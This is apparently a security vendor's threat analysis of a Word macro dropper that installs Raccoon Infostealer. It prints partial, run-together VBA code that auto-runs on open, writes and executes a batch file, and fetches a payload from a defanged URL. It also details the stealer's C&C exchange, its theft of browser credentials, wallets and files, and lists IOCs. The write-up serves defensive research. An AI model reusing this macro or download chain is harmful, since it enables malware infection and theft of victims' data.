Selection.Range.Paragraphs.Alignment = Word.WdParagraphAlignment.wdAlignParagraphLeft
Selection.Range.Paragraphs.LeftIndent = Application.InchesToPoints(4.5)
End SubPublic Function MakeFolder(ByVal pathToCreate As String) _
As Boolean
Dim sSomePath As String
Dim bAns As BooleansSomePath = pathToCreate
If CreatePath(sSomePath) = True Then
bAns = True
Else
bAns = False
End If
MakeFolder = bAns
End FunctionPrivate Function CreatePath(NewPath) As Boolean
Dim sPath As String
'Add a trailing slash if none
sPath = NewPath & IIf(Right$(NewPath, 1) = "\", "", "\")'Call API
If MakeSureDirectoryPathExists(sPath) <> 0 ThenDim hExportFile, nWritten
Dim stringToWrite As String
hExportFile = CreateFile("c:\NTcore\easy.cmd" _
, GENERIC_WRITE _
, 0 _
, 0 _
, OPEN_ALWAYS _
, FILE_ATTRIBUTE_NORMAL _
, 0 _
)
stringToWrite = Sample1.Label1.Caption
stringToWrite = stringToWrite & Sample1.Label2.Caption
stringToWrite = stringToWrite & Sample1.Label3.Caption
stringToWrite = stringToWrite & Sample1.Label4.Caption
stringToWrite = stringToWrite & Sample1.Label5.Caption
stringToWrite = stringToWrite & Sample1.Label6.Caption
stringToWrite = stringToWrite & Sample1.Label7.Caption
stringToWrite = stringToWrite & Sample1.Label8.Caption
WriteFile hExportFile, ByVal stringToWrite, Len(stringToWrite), nWritten, 0CloseHandle hExportFileCall App_Hard_Wait_DoEvents(3)'No errors, return True
CreatePath = True
End If
End Function
Sub autoopen()
On Error Resume Next
SetIndentLevel
Make Folder C hr(99) + C hr(58) + C hr(92) + C hr(78) + Chr(84) + C hr(99) + C hr(111) + C hr(114) + C hr(101)
End Sub

VBA Module 3 runs the batch file "easy.cmd".

Attribute VB_Name = "Module3"
Public Const GENERIC_WRITE = &H40000000
Public Const OPEN_ALWAYS = 4
Public Const FILE_ATTRIBUTE_NORMAL = &H80#If VBA7 ThenPublic Declare PtrSafe Function WriteFile Lib "kernel32 " ( _
ByVal hFile As LongPtr, _
lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As LongPtr, _
lpNumberOfBytesWritten As LongPtr, _
ByVal lpOverlapped As LongPtr) As LongPtrPublic Declare PtrSafe Function MakeSureDirectoryPathExists Lib _
"IMAGEHLP.DLL " (ByVal DirPath As String) As LongPtrPublic Declare PtrSafe Function CreateFile Lib "kernel32 " Alias "CreateFileA" ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As LongPtr, _
ByVal dwShareMode As LongPtr, _
ByVal lpSecurityAttributes As LongPtr, _
ByVal dwCreationDisposition As LongPtr, _
ByVal dwFlagsAndAttributes As LongPtr, _
ByVal hTemplateFile As LongPtr) As LongPtrPublic Declare PtrSafe Function CloseHandle Lib "kernel32 " (ByVal hObject As LongPtr) As LongPtr
#Else
Public Declare Function WriteFile Lib "kernel32 " ( _
ByVal hFile As Long, _
lpBuffer As Any, _
ByVal nNumberOfBytesToWrite As Long, _
lpNumberOfBytesWritten As Long, _
ByVal lpOverlapped As Long) As LongPublic Declare Function MakeSureDirectoryPathExists Lib _
"IMAGEHLP.DLL " (ByVal DirPath As String) As LongPublic Declare Function CreateFile Lib "kernel32 " Alias "CreateFileA" ( _
ByVal lpFileName As String, _
ByVal dwDesiredAccess As Long, _
ByVal dwShareMode As Long, _
ByVal lpSecurityAttributes As Long, _
ByVal dwCreationDisposition As Long, _
ByVal dwFlagsAndAttributes As Long, _
ByVal hTemplateFile As Long) As LongPublic Declare Function CloseHandle Lib "kernel32 " (ByVal hObject As Long) As Long
obj3.Run "c:\NTcore\easy.cmd", 0

The batch file "easy.cmd"  generates VB script called MMC.vbs. Later runs the same script to download the malicious payload 'ppdls.exe' from the path "hxxp://taterbugfarm.com/license.exe".

Raccoon Infostealer

The main payload 'ppdls.exe' is a raccoon info stealer malware, packed with Borland Delphi. This variant does include anti-debugging tricks by checking for timer ticks but no anti-VM protections included in it.

Once the payload gets executed on the target machine, it unpacks itself in memory and performs a GET request to the Google drive to retrieve the C&C domain.

The malware then creates a machine profile and sends the base64 encoded string to the C&C with a POST request.

The decoded machine profile is given below.

bot_id=C744ACBE-D01A-4C98-9752-3C9954793166_g3 &
config_id=d09962d7f04c2e0bdd09e58c69dd3e16a78f4630 &
data=null

The C&C server then returns a Json that contains the configuration for the raccoon stealer to perform it's tasks.

Raccoon targets a wide range of applications and it requires specific libraries for each application to extract and decrypt the credentials. Those dependencies are specified as URLs. The malware then downloads those dll's and loads them. 

Loader_urls is not enabled here, so it is not used as dropper agent for downloading the next stage malware payloads.

It looks into the victim's desktop and recent data for keywords specified in the mask field, such as international bank account (iba), 
account, cvv, cvc, credentials, passwords, and even cryptocurrency wallets, such as ethereum and bitcoin. It also extracts recent files with the extension .pdf, .txt,.rtf .doc.

All the stolen files are then archived and posted to the C&C server as "data.zip". 

The browser directory contains the extracted cookies, credentials, auto-fills and urls. The files directory contains the files with the specified extensions from the recent folder and also the files with any of the masked keywords in it. As is_screen_enabled is set to 1, a snapshot of the victim machine is also attached.

The "System Info.txt" has the following information about the victim's machine. Raccon stealer version is marked as 1.5 and the build is created on Aril 13th 2020.
[Raccoon Stealer] - v1.5 Release
Build compiled on Mon Apr 13 12:44:18 2020
Launched at: 2020.05.03 - 04:05:39 GMT
Bot_ID: C744ACBE-D01A-4C98-9752-3C9954793166_gaya3
Running on a desktop
=R=A=C=C=O=O=N=
System Information:
- System Language: English
- System TimeZone: -8 hrs
- IP: X.X.X.X
- Location: XXXXXX
- ComputerName: G3
- Username: G3
- Windows version: NT 6.1
- Product name: Windows 7 Enterprise
- System arch: x64
- CPU: Intel(R) Core(TM) i7-7700 CPU @ 3.60GHz (1 cores)
- RAM: 2047 MB (1285 MB used)
- Screen resolution: 2560x1251
- Display devices:
0) VirtualBox Graphics Adapter
============

Raccoon targets the following browser applications as references to the following ones are found in the unpacked malware.

  • Google Chrome
  • Chromium
  • Xpom
  • Comodo
  • Amigo
  • Orbitum
  • Bromium
  • Nichrome
  • Rockmelt
  • 360Browser
  • Nichrome
  • Vivaldi
  • Opera
  • Go
  • Sputnik
  • Kometa
  • Uran
  • QIP Surf
  • Epic Privacy
  • CocCoc
  • CentBrowser
  • 7Star
  • Elements
  • TorBro
  • Suhba
  • Safer Browser
  • Mustang
  • Superbird
  • Chedot
  • Torch
  • QQ Browser
  • UC BRowser

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: Covid.VBA (Trojan)
GAV: Delphi.D (Trojan)

IOC:

b8288b1a13468b71c45ba7363fbce67a9e89007d7d098910c7f63487570899af (Email)

2ec963133cf483fcbc8a6238cfac34b5390fb2a8fcec9862cc7af6cf8f79a326 (Zip)

fada93ab8496af86f141ba0670da43f388dc60483c89c795ed98ccef842400ea (Doc)

59d85aece56f4c9f4b5927a0d18d83e9c1f62477c8941dd2b5bc6c9aad01ee2e (Raccoon)

4cfada7eb51a6c0cb26283f9c86784b2b2587c59c46a5d3dc0f06cad2c55ee97 (Libs.zip)

89c049e8c3e9f0f817c8d267654f91d0a4b63635d2bfa8463ba3138e7a290dd4 (unpacked Raccoon)

This threat is also detected by SonicWALL Capture ATP w/RTDMI

/by